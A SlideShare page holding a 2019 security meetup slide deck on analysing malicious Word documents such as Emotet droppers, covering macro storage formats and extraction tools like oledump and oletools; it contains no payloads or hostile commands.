SlideShare une entreprise Scribd logo

Malicious Word Document Analysis

Oguzhan Topgul
Oguzhan Topgul

Malicious Word Document Analysis

Technologie
1  sur  12
Télécharger pour lire hors ligne
WORD DOC ANALYSIS MALICIOUS Silicon Valley Cyber Security Meetup October 2019
MALICIOUS WORD DOC ANALYSIS EMOTET ▸ Attackers actively using word docs with obfuscated macros ▸ Macro runs a powershell script to download main executable
MALICIOUS WORD DOC ANALYSIS HOW MACROS ARE STORED? ▸ MS Office 97-2003 documents ▸ Microsoft Compound File Binary (CFB) a.k.a OLE (Object Linking and Embedding) ▸ Like a filesystem ▸ Consists of segments called streams ▸ VBA Storage contains the source code as compressed https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-doc/ccd7b486-7881-484c-a137-51170af7cc22
MALICIOUS WORD DOC ANALYSIS HOW MACROS ARE STORED? ▸ MS Office 2007+ documents ▸ MS Open XML format ▸ XML Files in a ZIP archive ▸ Macros are stored in a binary OLE file within ZIP archive called “vbaProject.bin”
MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oledump: https://blog.didierstevens.com/programs/oledump-py/ python oledump.py DOC_NAME ▸ oletools: https://github.com/decalage2/oletools sudo -H pip install -U oletools ▸ oleid: to analyze OLE files to detect specific characteristics usually found in malicious files. ▸ olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML). ▸ olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams. ▸ olemeta: to extract all standard properties (metadata) from OLE files. ▸ oletimes: to extract creation and modification timestamps of all streams and storages. ▸ oledir: to display all the directory entries of an OLE file, including free and orphaned entries. ▸ olemap: to display a map of all the sectors in an OLE file.
MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oletools: https://github.com/decalage2/oletools ▸ olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oledump: https://blog.didierstevens.com/programs/ oledump-py/
MALICIOUS WORD DOC ANALYSIS EXTRACT CMD / POWERSHELL FROM VBA SCRIPT ▸ There is going to be a lot of ▸ Unused benign code ▸ Junk code ▸ Obfuscation ▸ String replacements ▸ Powershell code will be the downloader ▸ Download URLs will be obfuscated
LIVE DEMO MALICIOUS WORD DOC ANALYSIS
MALICIOUS WORD DOC ANALYSIS USING DEBUGGER ▸ Microsoft Visual Basic for Applications Editor
LIVE DEMO MALICIOUS WORD DOC ANALYSIS
ANY QUESTIONS?

Recommandé

MongoDB
MongoDBMongoDB
MongoDBjsterce
 
File handling
File handlingFile handling
File handlingNithyaNithyav
 
Working with disconnected data in Windows Store apps
Working with disconnected data in Windows Store appsWorking with disconnected data in Windows Store apps
Working with disconnected data in Windows Store appsAlex Casquete
 
phptut4
phptut4phptut4
phptut4tutorialsruby
 
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019Dave Stokes
 
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...Dave Stokes
 
SAP integration sample payloads for Azure Logic Apps
SAP integration sample payloads for Azure Logic AppsSAP integration sample payloads for Azure Logic Apps
SAP integration sample payloads for Azure Logic AppsDavid Burg
 
Obevo Javasig.pptx
Obevo Javasig.pptxObevo Javasig.pptx
Obevo Javasig.pptxLadduAnanu
 

Recommandé

MongoDB
MongoDBMongoDB
MongoDBjsterce
 
File handling
File handlingFile handling
File handlingNithyaNithyav
 
Working with disconnected data in Windows Store apps
Working with disconnected data in Windows Store appsWorking with disconnected data in Windows Store apps
Working with disconnected data in Windows Store appsAlex Casquete
 
phptut4
phptut4phptut4
phptut4tutorialsruby
 
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019Dave Stokes
 
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...Dave Stokes
 
SAP integration sample payloads for Azure Logic Apps
SAP integration sample payloads for Azure Logic AppsSAP integration sample payloads for Azure Logic Apps
SAP integration sample payloads for Azure Logic AppsDavid Burg
 
Obevo Javasig.pptx
Obevo Javasig.pptxObevo Javasig.pptx
Obevo Javasig.pptxLadduAnanu
 
Containerized Data Persistence on Mesos
Containerized Data Persistence on MesosContainerized Data Persistence on Mesos
Containerized Data Persistence on MesosJoe Stein
 
Slides
SlidesSlides
Slideswebhostingguy
 
Mohamed Mahgoub_CV
Mohamed Mahgoub_CVMohamed Mahgoub_CV
Mohamed Mahgoub_CVMohamed Mahgoub
 
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...C4Media
 
Using Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 FlowUsing Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 FlowKarsten Dambekalns
 
Pwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdfPwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdfrskvp93
 
Daos
DaosDaos
DaosUlrich Krause
 
A walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloudA walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloudsiculars
 
MongoDB
MongoDBMongoDB
MongoDBMartin Lazarov
 
Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019Dave Stokes
 
How to use source control with apex?
How to use source control with apex?How to use source control with apex?
How to use source control with apex?Oliver Lemm
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechkaran saini
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechArpit Meena
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechChristian Esparagoza
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechMicrosoft Tech
 
Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Jim Birch
 
Shell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdfShell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdfAkhashRamnath
 
Css Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder
 
[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the Basics[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the BasicsUlrich Krause
 
Using MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content RepositoryUsing MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content RepositoryMongoDB
 
Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterOguzhan Topgul
 
iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)Oguzhan Topgul
 

Contenu connexe

Similaire à Malicious Word Document Analysis

Containerized Data Persistence on Mesos
Containerized Data Persistence on MesosContainerized Data Persistence on Mesos
Containerized Data Persistence on MesosJoe Stein
 
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...C4Media
 
Using Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 FlowUsing Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 FlowKarsten Dambekalns
 
Pwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdfPwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdfrskvp93
 
A walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloudA walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloudsiculars
 
Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019Dave Stokes
 
How to use source control with apex?
How to use source control with apex?How to use source control with apex?
How to use source control with apex?Oliver Lemm
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechkaran saini
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechArpit Meena
 
Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Jim Birch
 
Shell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdfShell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdfAkhashRamnath
 
Css Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder
 
[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the Basics[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the BasicsUlrich Krause
 
Using MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content RepositoryUsing MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content RepositoryMongoDB
 

Similaire à Malicious Word Document Analysis (20)

Containerized Data Persistence on Mesos
Containerized Data Persistence on MesosContainerized Data Persistence on Mesos
Containerized Data Persistence on Mesos
 
Slides
SlidesSlides
Slides
 
Mohamed Mahgoub_CV
Mohamed Mahgoub_CVMohamed Mahgoub_CV
Mohamed Mahgoub_CV
 
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
 
Using Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 FlowUsing Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 Flow
 
Pwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdfPwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdf
 
Daos
DaosDaos
Daos
 
A walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloudA walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloud
 
MongoDB
MongoDBMongoDB
MongoDB
 
Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019
 
How to use source control with apex?
How to use source control with apex?How to use source control with apex?
How to use source control with apex?
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...
 
Shell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdfShell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdf
 
Css Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder.com | Cssfounder Net
Css Founder.com | Cssfounder Net
 
[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the Basics[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the Basics
 
Using MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content RepositoryUsing MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content Repository
 

Plus de Oguzhan Topgul

Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterOguzhan Topgul
 
iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)Oguzhan Topgul
 
Media Files : Android's New Nightmare
Media Files : Android's New NightmareMedia Files : Android's New Nightmare
Media Files : Android's New NightmareOguzhan Topgul
 
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)Oguzhan Topgul
 
Geçmişten Günümüze Mobil Zararlı Yazılımlar
Geçmişten Günümüze Mobil Zararlı YazılımlarGeçmişten Günümüze Mobil Zararlı Yazılımlar
Geçmişten Günümüze Mobil Zararlı YazılımlarOguzhan Topgul
 
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014Oguzhan Topgul
 
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...Oguzhan Topgul
 

Plus de Oguzhan Topgul (7)

Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow Better
 
iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)
 
Media Files : Android's New Nightmare
Media Files : Android's New NightmareMedia Files : Android's New Nightmare
Media Files : Android's New Nightmare
 
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)
 
Geçmişten Günümüze Mobil Zararlı Yazılımlar
Geçmişten Günümüze Mobil Zararlı YazılımlarGeçmişten Günümüze Mobil Zararlı Yazılımlar
Geçmişten Günümüze Mobil Zararlı Yazılımlar
 
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014
 
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...
 

Dernier

ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxFIDO Alliance
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Introduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxIntroduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxFIDO Alliance
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxFIDO Alliance
 
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxFIDO Alliance
 
Intro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptxIntro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptxFIDO Alliance
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 
WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024Lorenzo Miniero
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityWSO2
 
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)Samir Dash
 
Event-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream ProcessingEvent-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream ProcessingScyllaDB
 
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data PlatformLess Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data PlatformWSO2
 
Decarbonising Commercial Real Estate: The Role of Operational Performance
Decarbonising Commercial Real Estate: The Role of Operational PerformanceDecarbonising Commercial Real Estate: The Role of Operational Performance
Decarbonising Commercial Real Estate: The Role of Operational PerformanceIES VE
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsLeah Henrickson
 
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Paige Cruz
 
The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...
The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...
The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...SOFTTECHHUB
 

Dernier (20)

ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptx
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Introduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxIntroduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptx
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptx
 
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
 
Intro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptxIntro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptx
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
 
Event-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream ProcessingEvent-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream Processing
 
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data PlatformLess Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
 
Decarbonising Commercial Real Estate: The Role of Operational Performance
Decarbonising Commercial Real Estate: The Role of Operational PerformanceDecarbonising Commercial Real Estate: The Role of Operational Performance
Decarbonising Commercial Real Estate: The Role of Operational Performance
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
 
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
 
The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...
The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...
The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...
 

Malicious Word Document Analysis

  • 1. WORD DOC ANALYSIS MALICIOUS Silicon Valley Cyber Security Meetup October 2019
  • 2. MALICIOUS WORD DOC ANALYSIS EMOTET ▸ Attackers actively using word docs with obfuscated macros ▸ Macro runs a powershell script to download main executable
  • 3. MALICIOUS WORD DOC ANALYSIS HOW MACROS ARE STORED? ▸ MS Office 97-2003 documents ▸ Microsoft Compound File Binary (CFB) a.k.a OLE (Object Linking and Embedding) ▸ Like a filesystem ▸ Consists of segments called streams ▸ VBA Storage contains the source code as compressed https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-doc/ccd7b486-7881-484c-a137-51170af7cc22
  • 4. MALICIOUS WORD DOC ANALYSIS HOW MACROS ARE STORED? ▸ MS Office 2007+ documents ▸ MS Open XML format ▸ XML Files in a ZIP archive ▸ Macros are stored in a binary OLE file within ZIP archive called “vbaProject.bin”
  • 5. MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oledump: https://blog.didierstevens.com/programs/oledump-py/ python oledump.py DOC_NAME ▸ oletools: https://github.com/decalage2/oletools sudo -H pip install -U oletools ▸ oleid: to analyze OLE files to detect specific characteristics usually found in malicious files. ▸ olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML). ▸ olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams. ▸ olemeta: to extract all standard properties (metadata) from OLE files. ▸ oletimes: to extract creation and modification timestamps of all streams and storages. ▸ oledir: to display all the directory entries of an OLE file, including free and orphaned entries. ▸ olemap: to display a map of all the sectors in an OLE file.
  • 6. MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oletools: https://github.com/decalage2/oletools ▸ olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
  • 7. MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oledump: https://blog.didierstevens.com/programs/ oledump-py/
  • 8. MALICIOUS WORD DOC ANALYSIS EXTRACT CMD / POWERSHELL FROM VBA SCRIPT ▸ There is going to be a lot of ▸ Unused benign code ▸ Junk code ▸ Obfuscation ▸ String replacements ▸ Powershell code will be the downloader ▸ Download URLs will be obfuscated
  • 10. MALICIOUS WORD DOC ANALYSIS USING DEBUGGER ▸ Microsoft Visual Basic for Applications Editor
  • 11. LIVE DEMO MALICIOUS WORD DOC ANALYSIS